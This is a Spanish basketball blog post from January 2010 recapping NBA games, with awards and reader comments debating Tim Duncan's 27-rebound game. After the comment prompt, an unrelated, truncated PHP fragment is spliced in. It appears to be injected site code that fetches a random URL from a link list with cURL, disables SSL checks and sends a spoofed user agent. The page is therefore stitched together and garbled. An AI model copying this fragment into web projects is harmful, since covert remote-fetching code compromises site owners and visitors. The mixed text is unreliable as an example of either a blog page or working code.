La Crónica (27/01/10)

28 de January de 2010 por txusma

Para que luego no digan que no hablamos de los Clippers hoy abriremos con ellos. Los Nets consiguen la 4ª victoria de la temporada por casi 20 puntos de diferencia sobre el equipo humilde de L.A. Ejecutados por Keyon Dooling y Khris Humphries (que no podemos entender cómo no han estado en las quinielas del all-star, vaya) además del habitual buen partido de Brook López. En cambio, Devin Harris no fue de la partida. Por parte de los Clippers la única ausencia la ya conocida de Blake Griffin y no debería servir como excusa lo del nº1 del draft maldito para dar la imagen que están dando. Con esta derrota quedan definidos los objetivos a los que aspiran.

Con Cavs y Lakers disfrutando de paseos frente a Wolves y Pacers respectivamente, el pulso lo marcan los equipos en liza para la postemporada. Vaya momento de Marc y Zach. Qué pasada de dúo interior. Ayer 49 puntos 25 rebotes entre ambos en un excelente escenario como es el Palace de Auburn Hills. Si Randolph no es nombrado hoy en la lista del ASG el evento quedará muy tocado y es que ahora mismo imprescindible. No podemos ni imaginar siquiera que no le elijan.

Un 60% le endosó Utah a la defensa de McMillan en el Rose Garden. Para hacer honor al nombre, últimamente esta cancha se parece peligrosamente a un plácido jardín, donde los rivales se pasean. La mala noticia es que acumulan 19 derrotas y el corte del oeste está en 20, con Thunder, Hornets y Rockets a las puertas. La buena es que volvió Batum y haciéndolo bien. Conociendo al viejo Nate, será capaz de convertir la ventaja en desventaja, afectando en el juego de Rudy y de Webster.

Los Spurs tiraron de “titán” Duncan para destrozar a los Hawks. Sin embargo cayó Parker lesionado. Según el alcance la cosa se puede volver muy tensa. Otro que estuvo increíble fue Chris Paul en Oakland. Los Hornets han ganado 4 de sus últimos 5 partidos y acumulan un 11-4 en Enero. Parece evidente que están en condiciones de culminar la remontada.

Muy negativa la jornada para los Thunder, que cayeron demasiado fácil en casa contra los Bulls. Peor lo fue para los Rockets que, aunque nunca dieron su brazo a torcer contra unos Nuggets en forma (aún sin Melo) están definitivamente en barrena.

Por último, los Raptors lograron una importantísima victoria contra los Heat y los Bucks hicieron lo propio contra los Sixers.

PREMIOS

MVP: La pareja Kobe-Bynum jugó unos de sus mejores partidos. Anotaron 56 puntos en una serie de 22 de 29 lanzamientos, cogieron 21 rebotes y repartieron 9 asistencias. Imparables. En Toronto, Chris Bosh se fue a los 24 puntos, 18 rebotes y 4 asistencias siendo el estilete principal de los Raptors en su victoria frente los Heat. Destacabilísimo fue también el partido de Marc Gasol, 25 puntos, 12 rebotes, 4 asistencias y 2 robos. Pero los auténticos MVP de la jornada sson un viejo rockero como Tim Duncan, capaz de anotar 21 puntos, repartir 6 asistencias y coger ¡27 rebotes!, y Chris Paul, que con 38 puntos, 6 rebotes y 9 asistencias fue el mejor de su partido.

Rookies: Victoria de los Nets, en parte gracias al completo partido de Terrence Williams, 7 puntos, 9 rebotes y 8 asistencias. Por su parte, Jonas Jebreko celebró su elección para el partido de las estrellas con 8 puntos y 7 rebotes mientras que Marcus Thorton se reivindicó con 18 puntos. De todas maneras, ninguno de los 3 le llega a las suelas de las zapatillas de Stephen Curry. Ayer, 15 puntitos, 5 rebotes y 8 asistencias.

Sorpresa: En 24 minutos de juego, 23 puntos y 8 rebotes. JJ Hickson se consolida poco a poco en el quinteto titular de los Cavs y sus actuaciones no lo hacen desmerecer en absoluto. Como ya dijimos algunos días, los Nets parecen ser un equipo en que Kris Humphries puede aportar y dispararse en sus números. Anoche consiguió 25 puntos y 8 rebotes. Y hace poco volvió a jugar Nicolas Batum y va pillando el tono. Anoche, 16 puntos y4 rebotes.

Decepción: Muy mal día el de Andre Miller,  7 puntos con un 2 de 11 en tiro, 4 rebotitos, 3 asistencias y 3 pérdidas. Curiosamente enfrente jugaba Mehmet Okur que en 36 minutos de juego tan solo tiró 3 veces y se quedó en 2 puntos y 4 rebotes. ¿Se dejó llevar?

Esfuerzo en vano: Los Raptors van hacia arriba y ni siquiera los 35 puntos y 10 asistencias de Dwyane Wade evitaron la derrota de los Heat. En Milwaukke, el mejor Elton Brand de los últimos tiempos (26-10) no fue suficiente para doblegar a los Bucks. En Oklahoma los locales se vieron sorprendidos por los Bulls a pesar de los 28 puntos, 11 rebotes y 5 asistencias de Kevin Durant y finalmente, Joe Johnson y sus 31 puntos no sirvieron para vencer a los Spurs.

Comenta

17 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Vaya máquina Duncan por dios!!! Que jugador estamos teniendo la ocasion de ver, a la altura de los mas grandes de la historia, entre los interiores seguramente un top-5.

    Aunque para mi este año la liga esta siendo de un nivel algo inferior a las anteriores, en cuanto a individualidades hay poco de lo que quejarse.

      Citar

  2. elpiratilla dice:
    #2

    Nunca te acuerdas de Derrick Rose y los bulls como MVP o equipo en alza. Creo que ganar consecutivamente en las canchas de Houston, Phoenix, San Antonia y Oklahoma no está al alcance de cualquiera. Go Bulls!!

      Citar

  3. pcerezo dice:
    #3

    Al hilo de lo que dices del nivel de la liga estoy de acuerdo que ha bajado con respecto a años anteriores, pero estoy observando un poco creo que los equipos de arriba están midiendo muchos sus esfuerzos de cara a la postseason. Hay que tener en cuenta la edad:
    Lakers: Bryant (32), Gasol (29), Odom (31), Artest (30), Fisher (35)
    Celtics: Pierce (32), Allen (33), Garnett (33), Wallace (35)
    Cavaliers: Oneal (38) e Ilgauskas (36)
    Spurs: Dunca (34), Ginobili (32), Mcdyess (35)

    Creo que esto está influyendo en el juego global de la competición. Lo bueno es que los play offs, con tanta veteranía, van a ser a cara de perro.

    Tremendo Grizzlies. Randolph-Gasol “Twim Towers”.

    Un saludo,
    Pablo

      Citar

  4. rojorob dice:
    #4

    FE DE ERRATAS

    Se te ha ido el dedo con los rebotes de Duncan. No sé cuántos cogió pero 27 es imposible. Corrígelo cuando puedas. El resto fenomenal como siempre.

      Citar

  5. Hynreck dice:
    #5

    Me alegro de la racha de los Rockets, sobre todo por aquellos que pensaban que no necesitaban a McGrady (Por lo que se ve en Houston van sobrados de talento como para andar mallgastandolo)…

    Pues mola esto de hacer demagogia si…

      Citar

  6. Txusma dice:
    #6

    Ese Hynreck puñetero… jejeje

    27 rebotes como 27 soles. Ni uno más, ni uno menos (a no ser que todo el mundo esté equivocado)

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    No puedo con Denver,,pero sin Carmelo,,equipazo.

      Citar

  8. xapa_croack dice:
    #8

    la pregunta es si clippers hubiera ganado tambien hubiera sido portada???? yo apuesto a que no.

      Citar

  9. sergio dice:
    #9

    Si que cogio 27 si…. supongo que puede ser la mejor marca reboteadora en 10 años por lo menos… voy a documentarme

      Citar

  10. sergio dice:
    #10

    Mejor marca reboteadora desde 2002:

    Dikembe Mutombo 29 2001-01-31 ATL
    Dikembe Mutombo 29 1999-12-14 ATL
    Dennis Rodman 29 1997-12-27 CHI
    Dennis Rodman 29 1993-11-09 SAS
    Herb Williams 29 1989-01-23 IND
    Ben Wallace 28 2002-03-24 DET
    Ben Wallace 28 2001-04-17 DET
    Dikembe Mutombo 28 2000-12-26 ATL
    Popeye Jones 28 1996-01-09 DAL
    Dennis Rodman 28 1993-12-01 SAS
    Shaquille O’Neal 28 1993-11-20 ORL

    y despues tito Duncan

      Citar

  11. sergio dice:
    #11

    Hay mas por encima… hasta 35 rebotes contando solo desde la temporada 86/87 en adelante

      Citar

  12. Txusma dice:
    #12

    Es que ganar a los Nets no es noticia. La noticia es que los Nets ganen a alguien, llamese Clippers o llamese Lakers. De todas maneras, supongo que estarás de acuerdo en que la imagen de los Clippers, en especial dsd la confirmación de la lesión de Griffin, es penosa, penosa. A ver si el año q viene tienen más suerte.

      Citar

  13. Hynreck dice:
    #13

    Txus, iba sin ningún tipo de maldad contra tí en particular eh?, ni siquiera me acuerdo de quien se postuló a favor de lo de TMac y quien en contra.

    Sólo que me apetecía ser un poco ventajista… 😛

      Citar

  14. Hynreck dice:
    #14

    Por cierto, lo de Jerebko al All- Star me parece merecidísimo, una grata sorpresa lo de este chaval.

      Citar

  15. Jona dice:
    #15

    camby cogio 27 la pasada temporada contra chicago (17 de diciembre)

      Citar

  16. Tobal dice:
    #16

    Ojito con la mala racha de los Rockets,como sigan así de mal,se pueden quedar fuera de los playoffs,mientras que los Grizzlies están imparables y ya ganan hasta en Detroit,con la pareja Marc Gasol y Randolph,en plan de estrellas.

      Citar

  17. sergio dice:
    #17

    Pues eso Jona… la mejor marca reboteadora desde 2002… es la misma marca no? jaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>